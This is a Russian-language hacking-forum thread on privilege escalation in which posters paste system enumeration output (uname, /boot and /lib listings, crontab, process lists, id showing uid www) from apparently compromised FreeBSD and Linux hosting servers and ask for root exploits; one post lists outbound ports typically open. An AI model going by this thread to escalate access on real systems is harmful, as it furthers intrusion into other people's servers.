Повышение прав [задай вопрос - получи ответ]

Discussion in 'Уязвимости' started by Expl0ited, 1 Oct 2011.

  1. b3

    Исходящие соединения зачастую разрешены на порты 25, 53, 80, 8080, 21
     
  2. nikonic

    Code:
    $ uname -a
    FreeBSD сайт 7.4-RELEASE-p7 FreeBSD 7.4-RELEASE-p7 #3: Fri May  4 12:59:48 YEKT 2012   alex@ сайт:/usr/obj/usr/src/sys/сайт i386
    $ ls -la /boot
    total 3328
    drwxr-xr-x  12 root  wheel    1024 Aug  4  2013 .
    drwxr-xr-x  22 root  wheel     512 May 14  2012 ..
    drwxr-xr-x   2 root  wheel   28672 Feb 17  2011 GENERIC
    -r--r--r--   1 root  wheel    7689 May 14  2012 beastie.4th
    -r--r--r--   1 root  wheel    8192 May 14  2012 boot
    -r--r--r--   1 root  wheel     512 May 14  2012 boot0
    -r--r--r--   1 root  wheel     512 May 14  2012 boot0sio
    -r--r--r--   1 root  wheel     512 May 14  2012 boot1
    -r--r--r--   1 root  wheel    7680 May 14  2012 boot2
    -r--r--r--   1 root  wheel    1201 May 14  2012 cdboot
    drwxr-xr-x   2 root  wheel     512 May 14  2012 defaults
    -r--r--r--   1 root  wheel    1746 Feb 17  2011 device.hints
    drwxr-xr-x   2 root  wheel     512 Feb 17  2011 firmware
    -r--r--r--   1 root  wheel    2258 May 14  2012 frames.4th
    -r--r--r--   1 root  wheel    7567 May 14  2012 gptboot
    -r--r--r--   1 root  wheel   26259 May 14  2012 gptzfsboot
    drwxr-xr-x   2 root  wheel   12288 Aug  5  2013 kernel
    drwxr-xr-x   2 root  wheel   28672 Mar 30  2011 kernel.GENERIC
    drwxr-xr-x   2 root  wheel     512 Aug  3  2013 kernel.сайт
    drwxr-xr-x   2 root  wheel   12288 Aug  5  2013 kernel.modules
    drwxr-xr-x   2 root  wheel     512 May 14  2012 kernel.old
    -r-xr-xr-x   1 root  wheel  253952 May 14  2012 loader
    -r--r--r--   1 root  wheel    5865 May 14  2012 loader.4th
    -rw-r--r--   1 root  wheel      18 Mar 30  2011 loader.conf
    -rw-r--r--   1 root  wheel      17 Mar 30  2011 loader.conf.old
    -r--r--r--   1 root  wheel   15219 May 14  2012 loader.help
    -r-xr-xr-x   1 root  wheel  253952 Dec 30  2011 loader.old
    -r--r--r--   1 root  wheel     392 Feb 17  2011 loader.rc
    -r--r--r--   1 root  wheel     512 May 14  2012 mbr
    drwxr-xr-x   2 root  wheel     512 Feb 17  2011 modules
    -r--r--r--   1 root  wheel     512 May 14  2012 pmbr
    -r--r--r--   1 root  wheel  256000 May 14  2012 pxeboot
    -r--r--r--   1 root  wheel     699 May 14  2012 screen.4th
    -r--r--r--   1 root  wheel   35136 May 14  2012 support.4th
    drwxr-xr-x   2 root  wheel     512 Feb 17  2011 zfs
    -r--r--r--   1 root  wheel   33280 May 14  2012 zfsboot
    -r-xr-xr-x   1 root  wheel  274432 May 14  2012 zfsloader
    -r-xr-xr-x   1 root  wheel  274432 Dec 30  2011 zfsloader.old
    $ mount
    /dev/mfid0a on / (ufs, local, noatime, soft-updates)
    devfs on /dev (devfs, local)
    /dev/mfid0e on /usr/local (ufs, local, noatime, soft-updates)
    /dev/mfid0d on /usr (ufs, local, noatime, soft-updates)
    /dev/mfid0f on /var (ufs, local, noatime, soft-updates)
    /dev/mfid0g on /mail (ufs, local, noatime, soft-updates)
    /dev/mfid0h on /local (ufs, local, noatime, soft-updates)
    /dev/mfid1s1d on /opt (ufs, local, noatime)
    /dev/mfid1s1e on /backup (ufs, local, noatime)
    /dev/md0 on /local/www/сайт/cache (ufs, asynchronous, local, noexec, nosuid)
    $ df -h
    Filesystem       Size    Used   Avail Capacity  Mounted on
    /dev/mfid0a      1.9G    419M    1.4G    23%    /
    devfs            1.0K    1.0K      0B   100%    /dev
    /dev/mfid0e      4.8G    4.0K    4.5G     0%    /usr/local
    /dev/mfid0d      4.8G    4.4G     85M    98%    /usr
    /dev/mfid0f       48G     40G    4.8G    89%    /var
    /dev/mfid0g      194G    127G     51G    71%    /mail
    /dev/mfid0h      315G    225G     65G    78%    /local
    /dev/mfid1s1d    291G     28G    240G    10%    /opt
    /dev/mfid1s1e    286G    246G     17G    94%    /backup
    /dev/md0          31M    274K     28M     1%    /local/www/сайт/cache
    $ cat /etc/crontab
    # /etc/crontab - root's crontab for FreeBSD
    #
    # $FreeBSD: src/etc/crontab,v 1.32.24.1.4.1 2010/12/21 17:10:29 kensmith Exp $
    #
    SHELL=/bin/sh
    PATH=/etc:/bin:/sbin:/usr/bin:/usr/sbin
    #
    #minute    hour    mday    month    wday    who    command
    #
    */5    *    *    *    *    root    /usr/libexec/atrun
    #
    # Save some entropy so that /dev/random can re-seed on boot.
    */11    *    *    *    *    operator /usr/libexec/save-entropy
    #
    # Rotate log files every hour, if necessary.
    0    *    *    *    *    root    newsyslog
    #
    # Perform daily/weekly/monthly maintenance.
    1    3    *    *    *    root    periodic daily
    15    4    *    *    6    root    periodic weekly
    30    5    1    *    *    root    periodic monthly
    #
    # Adjust the time zone if the CMOS clock keeps local time, as opposed to
    # UTC time.  See adjkerntz(8) for details.
    1,31    0-5    *    *    *    root    adjkerntz -a
    $ ls -la /libexec
    total 736
    drwxr-xr-x   2 root  wheel     512 May 14  2012 .
    drwxr-xr-x  22 root  wheel     512 May 14  2012 ..
    -r-xr-xr-x   1 root  wheel  180896 Dec 30  2011 ld-elf.so.1
    -r-xr-xr-x   1 root  wheel  189184 Feb 17  2011 ld-elf.so.1.old
    $ ps axfu
    USER   PID %CPU %MEM   VSZ   RSS  TT  STAT STARTED      TIME COMMAND
    www  95411 42.9  1.2 54276 41460  ??  S     1:32PM   6:07.03 /usr/local/sbin/ht
    www   5177 25.5  2.2 100356 74032  ??  R     2:32PM   0:18.89 /usr/local/sbin/ht
    www  90963  8.9  1.2 54532 41976  ??  S     1:03PM   8:25.48 /usr/local/sbin/ht
    www  95403  8.4  1.2 54276 41800  ??  R     1:32PM   5:43.07 /usr/local/sbin/ht
    www  88613  8.3  1.2 54532 41816  ??  S    12:49PM  10:15.64 /usr/local/sbin/ht
    www   5696  7.9  0.1  3756  2668  ??  S     2:35PM   0:00.02 sendmail: ./t5H9Zj
    www   5695  7.8  0.0  3460  1144  ??  S     2:35PM   0:00.00 sh -c /usr/sbin/se
    www  94821  7.8  1.2 55300 41244  ??  S     1:28PM   6:21.93 /usr/local/sbin/ht
    www  96019  7.6  1.2 54276 41068  ??  S     1:36PM   5:11.63 /usr/local/sbin/ht
    www  95914  7.5  1.2 54276 41184  ??  S     1:35PM   5:31.22 /usr/local/sbin/ht
    www   5458  7.1  0.8 40964 26572  ??  S     2:34PM   0:07.37 /usr/local/sbin/ht
    www  95698  6.6  1.2 53252 40632  ??  S     1:34PM   5:23.52 /usr/local/sbin/ht
    www   5689  3.8  0.7 39940 22140  ??  S     2:35PM   0:00.56 /usr/local/sbin/ht
    www    914  3.6  0.2  8192  6688  ??  R    22May15 1399:37.78 nginx: worker proc
    www    913  2.9  0.2  9216  7344  ??  S    22May15 1401:01.32 nginx: worker proc
    www  95287  2.8  1.3 55300 42616  ??  R     1:31PM   6:12.23 /usr/local/sbin/ht
    www   5692  1.6  0.6 39940 20212  ??  S     2:35PM   0:00.23 /usr/local/sbin/ht
    www    932  0.0  0.3 36776 10456  ??  I    22May15   0:00.21 /usr/local/sbin/ht
    www   5702  0.0  0.0  3460  1144  ??  S     2:35PM   0:00.00 sh -c ps axfu
    www   5703  0.0  0.0  3244   944  ??  R     2:35PM   0:00.00 ps axfu
    www  20314  0.0  0.0     0     0  ??  Z    Mon09AM   0:00.00 <defunct>
    www  42814  0.0  0.0     0     0  ??  Z    Sun11PM   0:00.00 <defunct>
    www  50717  0.0  0.0  3460  1100  ??  I     8Jun15   0:00.01 /bin/sh -i
    www  52999  0.0  0.0  3128   700  ??  I     8Jun15   0:02.89 tail -f pureftpd.l
    www  58328  0.0  0.0     0     0  ??  Z    Sun12PM   0:00.05 <defunct>
    www  89316  0.0  0.0     0     0  ??  Z     3:28PM   0:00.00 <defunct>
    $ ls -la /tmp
    total 1280
    drwxrwxrwt  10 root         wheel   3072 Jun 17 14:39 .
    drwxr-xr-x  22 root         wheel    512 May 14  2012 ..
    drwxrwxrwt   2 root         wheel    512 May 22 17:34 .ICE-unix
    drwxrwxrwt   2 root         wheel    512 May 22 17:34 .X11-unix
    drwxrwxrwt   2 root         wheel    512 May 22 17:34 .XIM-unix
    drwxrwxrwt   2 root         wheel    512 May 22 17:34 .font-unix
    -rw-------   1 spamassasin  wheel   7221 Nov 25  2013 .spamassassin12210SilOHtmp
    drwx------   3 www          www      512 Dec 19  2011 fast
    prw-------   1 root         wheel      0 Mar 30  2011 make_fifo_VRxkXE6sJ
    drwx------   2 alex         wheel    512 Nov 15  2012 mc-alex
    drwx------   2 root         wheel    512 Jun  2 11:22 mc-root
    -rw-r--r--   1 www          wheel      0 Jun  8 15:53 overwrites
    -rw-------   1 root         wheel     36 Jun 23  2011 periodic.slLwSSsz08
    -rw-------   1 root         wheel     48 Jun 23  2011 periodic.vODgX3C8Hg
    drwxr-xr-x   3 root         wheel    512 Apr  9  2011 screens
    -rw-------   1 root         wheel      0 Jun 23  2011 security.MxksURwR
    $ id
    uid=80(www) gid=80(www) groups=80(www)
    
     
  3. ErrNick

    Подскажите что-нибудь для этой машинки.
    uname -a
    Code:
    Linux mh40.mobyhost.ru 2.6.18-400.1.1.el5 #1 SMP Thu Dec 18 00:59:53 EST 2014 x86_64 x86_64 x86_64 GNU/Linux
    ls -la --full-time /lib
    Code:
    total 17352
    drwxr-xr-x 11 root root    4096 2015-06-16 01:09:12.000000000 +0300 .
    drwxr-xr-x 28 root root    4096 2015-06-30 23:01:02.000000000 +0300 ..
    -rw-r--r--  1 root root      65 2015-05-13 13:33:41.000000000 +0300 .libcrypto.so.0.9.8e.hmac
    lrwxrwxrwx  1 root root      25 2015-05-14 01:08:56.000000000 +0300 .libcrypto.so.6.hmac -> .libcrypto.so.0.9.8e.hmac
    -rw-r--r--  1 root root      65 2015-05-13 13:33:41.000000000 +0300 .libssl.so.0.9.8e.hmac
    lrwxrwxrwx  1 root root      22 2015-05-14 01:08:56.000000000 +0300 .libssl.so.6.hmac -> .libssl.so.0.9.8e.hmac
    drwxr-xr-x  2 root root    4096 2014-10-01 01:12:30.000000000 +0400 bdevid
    lrwxrwxrwx  1 root root      14 2014-10-01 01:11:14.000000000 +0400 cpp -> ../usr/bin/cpp
    drwxr-xr-x  2 root root    4096 2014-10-01 01:11:27.000000000 +0400 firmware
    drwxr-xr-x  3 root root    4096 2015-01-27 21:28:03.000000000 +0300 i686
    drwxr-xr-x  6 root root    4096 2013-01-09 07:14:22.000000000 +0400 kbd
    -rwxr-xr-x  1 root root  130860 2015-01-27 22:04:53.000000000 +0300 ld-2.5.so
    lrwxrwxrwx  1 root root       9 2015-01-28 18:11:41.000000000 +0300 ld-linux.so.2 -> ld-2.5.so
    lrwxrwxrwx  1 root root      13 2015-01-28 18:11:50.000000000 +0300 ld-lsb.so.3 -> ld-linux.so.2
    -rwxr-xr-x  1 root root    7664 2015-01-27 22:04:53.000000000 +0300 libBrokenLocale-2.5.so
    lrwxrwxrwx  1 root root      22 2015-01-28 18:11:41.000000000 +0300 libBrokenLocale.so.1 -> libBrokenLocale-2.5.so
    -rwxr-xr-x  1 root root   16704 2015-01-27 22:04:53.000000000 +0300 libSegFault.so
    -rwxr-xr-x  1 root root   14128 2015-01-27 22:04:53.000000000 +0300 libanl-2.5.so
    lrwxrwxrwx  1 root root      13 2015-01-28 18:11:41.000000000 +0300 libanl.so.1 -> libanl-2.5.so
    lrwxrwxrwx  1 root root      18 2010-02-26 16:19:28.000000000 +0300 libasound.so.2 -> libasound.so.2.0.0
    -rwxr-xr-x  1 root root  907328 2009-01-21 06:47:23.000000000 +0300 libasound.so.2.0.0
    lrwxrwxrwx  1 root root      17 2012-03-13 01:13:26.000000000 +0400 libaudit.so.0 -> libaudit.so.0.0.0
    -rwxr-xr-x  1 root root   95740 2012-02-22 19:10:06.000000000 +0400 libaudit.so.0.0.0
    lrwxrwxrwx  1 root root      19 2012-03-13 01:13:26.000000000 +0400 libauparse.so.0 -> libauparse.so.0.0.0
    -rwxr-xr-x  1 root root   58932 2012-02-22 19:10:06.000000000 +0400 libauparse.so.0.0.0
    lrwxrwxrwx  1 root root      15 2014-10-01 01:12:22.000000000 +0400 libblkid.so.1 -> libblkid.so.1.0
    -rwxr-xr-x  1 root root   36740 2014-09-18 14:12:28.000000000 +0400 libblkid.so.1.0
    -rwxr-xr-x  1 root root 1706208 2015-01-27 22:04:54.000000000 +0300 libc-2.5.so
    lrwxrwxrwx  1 root root      11 2015-01-28 18:11:42.000000000 +0300 libc.so.6 -> libc-2.5.so
    lrwxrwxrwx  1 root root      14 2009-09-29 10:32:08.000000000 +0400 libcap.so.1 -> libcap.so.1.10
    -rwxr-xr-x  1 root root   11560 2007-03-14 21:15:10.000000000 +0300 libcap.so.1.10
    -rwxr-xr-x  1 root root  191708 2015-01-27 22:04:55.000000000 +0300 libcidn-2.5.so
    lrwxrwxrwx  1 root root      14 2015-01-28 18:11:42.000000000 +0300 libcidn.so.1 -> libcidn-2.5.so
    lrwxrwxrwx  1 root root      17 2014-10-01 01:12:22.000000000 +0400 libcom_err.so.2 -> libcom_err.so.2.1
    -rwxr-xr-x  1 root root    6364 2014-09-18 14:12:28.000000000 +0400 libcom_err.so.2.1
    -rwxr-xr-x  1 root root   45432 2015-01-27 22:04:55.000000000 +0300 libcrypt-2.5.so
    lrwxrwxrwx  1 root root      15 2015-01-28 18:11:42.000000000 +0300 libcrypt.so.1 -> libcrypt-2.5.so
    -rwxr-xr-x  1 root root 1299328 2015-05-13 13:33:41.000000000 +0300 libcrypto.so.0.9.8e
    lrwxrwxrwx  1 root root      14 2009-09-29 10:32:08.000000000 +0400 libcrypto.so.4 -> libcrypto.so.6
    lrwxrwxrwx  1 root root      19 2015-05-14 01:08:56.000000000 +0300 libcrypto.so.6 -> libcrypto.so.0.9.8e
    -rwxr-xr-x  1 root root  838860 2007-01-07 08:37:48.000000000 +0300 libdb-4.1.so
    -rwxr-xr-x  1 root root  934132 2007-01-07 08:37:48.000000000 +0300 libdb-4.2.so
    -rwxr-xr-x  1 root root 1010204 2010-07-12 20:11:02.000000000 +0400 libdb-4.3.so
    -rwxr-xr-x  1 root root  905704 2007-01-07 08:37:48.000000000 +0300 libdb_cxx-4.1.so
    -rwxr-xr-x  1 root root 1019472 2007-01-07 08:37:48.000000000 +0300 libdb_cxx-4.2.so
    lrwxrwxrwx  1 root root      18 2013-10-20 01:11:03.000000000 +0400 libdbus-1.so.3 -> libdbus-1.so.3.4.0
    -rwxr-xr-x  1 root root  257492 2013-10-02 01:59:51.000000000 +0400 libdbus-1.so.3.4.0
    -r--r--r--  1 root root   45098 2014-11-18 13:11:21.000000000 +0300 libdevmapper-event.a
    lrwxrwxrwx  1 root root      26 2014-11-19 01:08:51.000000000 +0300 libdevmapper-event.so -> libdevmapper-event.so.1.02
    -r-xr-xr-x  1 root root   18488 2014-11-18 13:11:29.000000000 +0300 libdevmapper-event.so.1.02
    -r--r--r--  1 root root  496324 2014-11-18 13:11:15.000000000 +0300 libdevmapper.a
    lrwxrwxrwx  1 root root      20 2014-11-19 01:08:51.000000000 +0300 libdevmapper.so -> libdevmapper.so.1.02
    -r-xr-xr-x  1 root root  163292 2014-11-18 13:11:29.000000000 +0300 libdevmapper.so.1.02
    -rwxr-xr-x  1 root root   20668 2015-01-27 22:04:55.000000000 +0300 libdl-2.5.so
    lrwxrwxrwx  1 root root      12 2015-01-28 18:11:42.000000000 +0300 libdl.so.2 -> libdl-2.5.so
    lrwxrwxrwx  1 root root      13 2014-10-01 01:12:22.000000000 +0400 libe2p.so.2 -> libe2p.so.2.3
    -rwxr-xr-x  1 root root   20192 2014-09-18 14:12:28.000000000 +0400 libe2p.so.2.3
    lrwxrwxrwx  1 root root      17 2012-06-14 01:12:14.000000000 +0400 libexpat.so.0 -> libexpat.so.0.5.0
    -rwxr-xr-x  1 root root  135932 2012-06-13 18:35:31.000000000 +0400 libexpat.so.0.5.0
    lrwxrwxrwx  1 root root      16 2014-10-01 01:12:22.000000000 +0400 libext2fs.so.2 -> libext2fs.so.2.4
    -rwxr-xr-x  1 root root  113892 2014-09-18 14:12:28.000000000 +0400 libext2fs.so.2.4
    -rwxr-xr-x  1 root root   45192 2014-09-18 07:05:57.000000000 +0400 libgcc_s-4.1.2-20080825.so.1
    lrwxrwxrwx  1 root root      28 2014-10-01 01:12:23.000000000 +0400 libgcc_s.so.1 -> libgcc_s-4.1.2-20080825.so.1
    lrwxrwxrwx  1 root root      23 2009-09-29 10:32:11.000000000 +0400 libglib-2.0.so.0 -> libglib-2.0.so.0.1200.3
    -rwxr-xr-x  1 root root  644472 2009-03-25 04:52:17.000000000 +0300 libglib-2.0.so.0.1200.3
    lrwxrwxrwx  1 root root      26 2009-09-29 10:32:08.000000000 +0400 libgmodule-2.0.so.0 -> libgmodule-2.0.so.0.1200.3
    -rwxr-xr-x  1 root root   11396 2009-03-25 04:52:17.000000000 +0300 libgmodule-2.0.so.0.1200.3
    lrwxrwxrwx  1 root root      26 2009-09-29 10:32:08.000000000 +0400 libgobject-2.0.so.0 -> libgobject-2.0.so.0.1200.3
    -rwxr-xr-x  1 root root  259128 2009-03-25 04:52:17.000000000 +0300 libgobject-2.0.so.0.1200.3
    lrwxrwxrwx  1 root root      26 2009-09-29 10:32:11.000000000 +0400 libgthread-2.0.so.0 -> libgthread-2.0.so.0.1200.3
    -rwxr-xr-x  1 root root   14660 2009-03-25 04:52:17.000000000 +0300 libgthread-2.0.so.0.1200.3
    -rwxr-xr-x  1 root root   27964 2007-03-15 06:26:22.000000000 +0300 libiw.so.28
    -rwxr-xr-x  1 root root    6404 2007-01-06 10:57:38.000000000 +0300 libkeyutils-1.2.so
    lrwxrwxrwx  1 root root      18 2009-09-29 10:32:08.000000000 +0400 libkeyutils.so.1 -> libkeyutils-1.2.so
    -rwxr-xr-x  1 root root  216544 2015-01-27 22:04:55.000000000 +0300 libm-2.5.so
    lrwxrwxrwx  1 root root      11 2015-01-28 18:11:42.000000000 +0300 libm.so.6 -> libm-2.5.so
    -rwxr-xr-x  1 root root  109740 2015-01-27 22:04:55.000000000 +0300 libnsl-2.5.so
    lrwxrwxrwx  1 root root      13 2015-01-28 18:11:42.000000000 +0300 libnsl.so.1 -> libnsl-2.5.so
    -rwxr-xr-x  1 root root   36468 2015-01-27 22:04:55.000000000 +0300 libnss_compat-2.5.so
    lrwxrwxrwx  1 root root      20 2015-01-28 18:11:42.000000000 +0300 libnss_compat.so.2 -> libnss_compat-2.5.so
    -rwxr-xr-x  1 root root  827876 2015-01-05 13:12:47.000000000 +0300 libnss_db-2.2.so
    lrwxrwxrwx  1 root root      16 2015-01-06 01:08:48.000000000 +0300 libnss_db.so.2 -> libnss_db-2.2.so
    -rwxr-xr-x  1 root root   21948 2015-01-27 22:04:56.000000000 +0300 libnss_dns-2.5.so
    lrwxrwxrwx  1 root root      17 2015-01-28 18:11:42.000000000 +0300 libnss_dns.so.2 -> libnss_dns-2.5.so
    -rwxr-xr-x  1 root root   50848 2015-01-27 22:04:56.000000000 +0300 libnss_files-2.5.so
    lrwxrwxrwx  1 root root      19 2015-01-28 18:11:42.000000000 +0300 libnss_files.so.2 -> libnss_files-2.5.so
    -rwxr-xr-x  1 root root   22764 2015-01-27 22:04:56.000000000 +0300 libnss_hesiod-2.5.so
    lrwxrwxrwx  1 root root      20 2015-01-28 18:11:42.000000000 +0300 libnss_hesiod.so.2 -> libnss_hesiod-2.5.so
    -rwxr-xr-x  1 root root 3217504 2015-06-15 15:37:43.000000000 +0300 libnss_ldap-2.5.so
    lrwxrwxrwx  1 root root      18 2015-06-16 01:09:12.000000000 +0300 libnss_ldap.so.2 -> libnss_ldap-2.5.so
    -rwxr-xr-x  1 root root   46624 2015-01-27 22:04:56.000000000 +0300 libnss_nis-2.5.so
    lrwxrwxrwx  1 root root      17 2015-01-28 18:11:42.000000000 +0300 libnss_nis.so.2 -> libnss_nis-2.5.so
    -rwxr-xr-x  1 root root   55804 2015-01-27 22:04:56.000000000 +0300 libnss_nisplus-2.5.so
    lrwxrwxrwx  1 root root      21 2015-01-28 18:11:42.000000000 +0300 libnss_nisplus.so.2 -> libnss_nisplus-2.5.so
    lrwxrwxrwx  1 root root      16 2015-05-28 01:09:09.000000000 +0300 libpam.so.0 -> libpam.so.0.81.5
    -rwxr-xr-x  1 root root   43020 2015-05-27 16:48:30.000000000 +0300 libpam.so.0.81.5
    lrwxrwxrwx  1 root root      21 2015-05-28 01:09:09.000000000 +0300 libpam_misc.so.0 -> libpam_misc.so.0.81.2
    -rwxr-xr-x  1 root root    8624 2015-05-27 16:48:30.000000000 +0300 libpam_misc.so.0.81.2
    lrwxrwxrwx  1 root root      17 2015-05-28 01:09:09.000000000 +0300 libpamc.so.0 -> libpamc.so.0.81.0
    -rwxr-xr-x  1 root root    9868 2015-05-27 16:48:30.000000000 +0300 libpamc.so.0.81.0
    lrwxrwxrwx  1 root root      16 2013-10-20 01:10:29.000000000 +0400 libpcre.so.0 -> libpcre.so.0.0.1
    -rwxr-xr-x  1 root root  127760 2013-10-01 22:18:22.000000000 +0400 libpcre.so.0.0.1
    -rwxr-xr-x  1 root root  137944 2015-01-27 22:04:56.000000000 +0300 libpthread-2.5.so
    lrwxrwxrwx  1 root root      17 2015-01-28 18:11:42.000000000 +0300 libpthread.so.0 -> libpthread-2.5.so
    -rwxr-xr-x  1 root root   84904 2015-01-27 22:04:56.000000000 +0300 libresolv-2.5.so
    lrwxrwxrwx  1 root root      16 2015-01-28 18:11:42.000000000 +0300 libresolv.so.2 -> libresolv-2.5.so
    -rwxr-xr-x  1 root root   48156 2015-01-27 22:04:56.000000000 +0300 librt-2.5.so
    lrwxrwxrwx  1 root root      12 2015-01-28 18:11:42.000000000 +0300 librt.so.1 -> librt-2.5.so
    -rwxr-xr-x  1 root root   91892 2011-03-06 07:51:56.000000000 +0300 libselinux.so.1
    -rwxr-xr-x  1 root root  243928 2010-03-31 12:26:18.000000000 +0400 libsepol.so.1
    lrwxrwxrwx  1 root root      12 2014-10-01 01:12:22.000000000 +0400 libss.so.2 -> libss.so.2.0
    -rwxr-xr-x  1 root root   19008 2014-09-18 14:12:28.000000000 +0400 libss.so.2.0
    -rwxr-xr-x  1 root root  300636 2015-05-13 13:33:41.000000000 +0300 libssl.so.0.9.8e
    lrwxrwxrwx  1 root root      11 2009-09-29 10:32:08.000000000 +0400 libssl.so.4 -> libssl.so.6
    lrwxrwxrwx  1 root root      16 2015-05-14 01:08:56.000000000 +0300 libssl.so.6 -> libssl.so.0.9.8e
    lrwxrwxrwx  1 root root      19 2009-09-29 10:32:12.000000000 +0400 libtermcap.so.2 -> libtermcap.so.2.0.8
    -rwxr-xr-x  1 root root   11636 2007-01-06 16:01:17.000000000 +0300 libtermcap.so.2.0.8
    -rwxr-xr-x  1 root root   33852 2015-01-27 22:04:56.000000000 +0300 libthread_db-1.0.so
    lrwxrwxrwx  1 root root      19 2015-01-28 18:11:42.000000000 +0300 libthread_db.so.1 -> libthread_db-1.0.so
    -rwxr-xr-x  1 root root   13492 2015-01-27 22:04:56.000000000 +0300 libutil-2.5.so
    lrwxrwxrwx  1 root root      14 2015-01-28 18:11:42.000000000 +0300 libutil.so.1 -> libutil-2.5.so
    lrwxrwxrwx  1 root root      14 2014-10-01 01:12:22.000000000 +0400 libuuid.so.1 -> libuuid.so.1.2
    -rwxr-xr-x  1 root root   14472 2014-09-18 14:12:28.000000000 +0400 libuuid.so.1.2
    lrwxrwxrwx  1 root root      22 2014-10-01 01:12:29.000000000 +0400 libvolume_id.so.0 -> libvolume_id.so.0.66.0
    -rwxr-xr-x  1 root root   37032 2014-09-17 23:19:08.000000000 +0400 libvolume_id.so.0.66.0
    lrwxrwxrwx  1 root root      16 2009-10-23 01:10:46.000000000 +0400 libwrap.so.0 -> libwrap.so.0.7.6
    -rwxr-xr-x  1 root root   31344 2009-09-22 02:37:30.000000000 +0400 libwrap.so.0.7.6
    lrwxrwxrwx  1 root root      13 2013-01-18 01:13:38.000000000 +0400 libz.so -> libz.so.1.2.3
    lrwxrwxrwx  1 root root      13 2013-01-18 01:13:13.000000000 +0400 libz.so.1 -> libz.so.1.2.3
    -rwxr-xr-x  1 root root   75088 2012-07-17 12:32:17.000000000 +0400 libz.so.1.2.3
    drwxr-xr-x  2 root root    4096 2011-04-10 01:15:39.000000000 +0400 lsb
    drwxr-xr-x 12 root root    4096 2014-12-25 01:09:56.000000000 +0300 modules
    drwxr-xr-x  3 root root    4096 2015-01-28 18:11:42.000000000 +0300 rtkaio
    drwxr-xr-x  4 root root    4096 2015-06-16 01:09:12.000000000 +0300 security
    drwxr-xr-x  3 root root    4096 2015-07-01 04:23:58.000000000 +0300 udev
    ls -la --full-time /lib64
    Code:
    total 25552
    drwxr-xr-x  8 root root    4096 2015-07-01 04:24:40.000000000 +0300 .
    drwxr-xr-x 28 root root    4096 2015-06-30 23:01:02.000000000 +0300 ..
    -rw-r--r--  1 root root      65 2015-05-12 23:58:28.000000000 +0300 .libcrypto.so.0.9.8e.hmac
    lrwxrwxrwx  1 root root      25 2015-05-14 01:08:43.000000000 +0300 .libcrypto.so.6.hmac -> .libcrypto.so.0.9.8e.hmac
    -rw-r--r--  1 root root      65 2015-05-12 23:58:28.000000000 +0300 .libssl.so.0.9.8e.hmac
    lrwxrwxrwx  1 root root      22 2015-05-14 01:08:43.000000000 +0300 .libssl.so.6.hmac -> .libssl.so.0.9.8e.hmac
    drwxr-xr-x  2 root root    4096 2014-10-01 01:11:16.000000000 +0400 bdevid
    drwxr-xr-x  2 root root    4096 2015-01-29 04:17:01.000000000 +0300 dbus-1
    drwxr-xr-x  2 root root    4096 2014-10-01 01:10:52.000000000 +0400 device-mapper
    drwxr-xr-x  2 root root    4096 2012-10-31 01:09:48.000000000 +0400 iptables
    -rwxr-xr-x  1 root root  144776 2015-01-27 20:33:48.000000000 +0300 ld-2.5.so
    lrwxrwxrwx  1 root root       9 2015-01-28 18:11:22.000000000 +0300 ld-linux-x86-64.so.2 -> ld-2.5.so
    lrwxrwxrwx  1 root root      20 2015-01-28 18:11:50.000000000 +0300 ld-lsb-x86-64.so -> ld-linux-x86-64.so.2
    lrwxrwxrwx  1 root root      20 2011-04-10 01:15:38.000000000 +0400 ld-lsb-x86-64.so.3 -> ld-linux-x86-64.so.2
    -rwxr-xr-x  1 root root    8904 2015-01-27 20:33:48.000000000 +0300 libBrokenLocale-2.5.so
    lrwxrwxrwx  1 root root      22 2015-01-28 18:11:22.000000000 +0300 libBrokenLocale.so.1 -> libBrokenLocale-2.5.so
    -rwxr-xr-x  1 root root   22336 2015-01-27 20:33:48.000000000 +0300 libSegFault.so
    lrwxrwxrwx  1 root root      15 2012-03-13 01:11:51.000000000 +0400 libacl.so.1 -> libacl.so.1.1.0
    -rwxr-xr-x  1 root root   27920 2012-02-22 17:57:53.000000000 +0400 libacl.so.1.1.0
    -rwxr-xr-x  1 root root   20064 2015-01-27 20:33:48.000000000 +0300 libanl-2.5.so
    lrwxrwxrwx  1 root root      13 2015-01-28 18:11:22.000000000 +0300 libanl.so.1 -> libanl-2.5.so
    lrwxrwxrwx  1 root root      18 2009-10-06 15:17:14.000000000 +0400 libasound.so.2 -> libasound.so.2.0.0
    -rwxr-xr-x  1 root root  907552 2009-01-21 06:42:23.000000000 +0300 libasound.so.2.0.0
    lrwxrwxrwx  1 root root      16 2009-09-29 10:33:40.000000000 +0400 libattr.so.1 -> libattr.so.1.1.0
    -rwxr-xr-x  1 root root   17888 2007-01-06 08:09:58.000000000 +0300 libattr.so.1.1.0
    lrwxrwxrwx  1 root root      17 2012-03-13 01:11:49.000000000 +0400 libaudit.so.0 -> libaudit.so.0.0.0
    -rwxr-xr-x  1 root root   98920 2012-02-22 19:10:07.000000000 +0400 libaudit.so.0.0.0
    lrwxrwxrwx  1 root root      19 2012-03-13 01:11:49.000000000 +0400 libauparse.so.0 -> libauparse.so.0.0.0
    -rwxr-xr-x  1 root root   62200 2012-02-22 19:10:07.000000000 +0400 libauparse.so.0.0.0
    lrwxrwxrwx  1 root root      15 2014-10-01 01:10:44.000000000 +0400 libblkid.so.1 -> libblkid.so.1.0
    -rwxr-xr-x  1 root root   43840 2014-09-18 14:12:06.000000000 +0400 libblkid.so.1.0
    -rwxr-xr-x  1 root root 1726296 2015-01-27 20:33:48.000000000 +0300 libc-2.5.so
    lrwxrwxrwx  1 root root      11 2015-01-28 18:11:22.000000000 +0300 libc.so.6 -> libc-2.5.so
    lrwxrwxrwx  1 root root      14 2009-09-29 10:33:39.000000000 +0400 libcap.so.1 -> libcap.so.1.10
    -rwxr-xr-x  1 root root   17384 2007-03-14 21:13:01.000000000 +0300 libcap.so.1.10
    -rwxr-xr-x  1 root root  197744 2015-01-27 20:33:48.000000000 +0300 libcidn-2.5.so
    lrwxrwxrwx  1 root root      14 2015-01-28 18:11:22.000000000 +0300 libcidn.so.1 -> libcidn-2.5.so
    lrwxrwxrwx  1 root root      17 2014-10-01 01:10:44.000000000 +0400 libcom_err.so.2 -> libcom_err.so.2.1
    -rwxr-xr-x  1 root root   10096 2014-09-18 14:12:06.000000000 +0400 libcom_err.so.2.1
    -rwxr-xr-x  1 root root   48600 2015-01-27 20:33:48.000000000 +0300 libcrypt-2.5.so
    lrwxrwxrwx  1 root root      15 2015-01-28 18:11:22.000000000 +0300 libcrypt.so.1 -> libcrypt-2.5.so
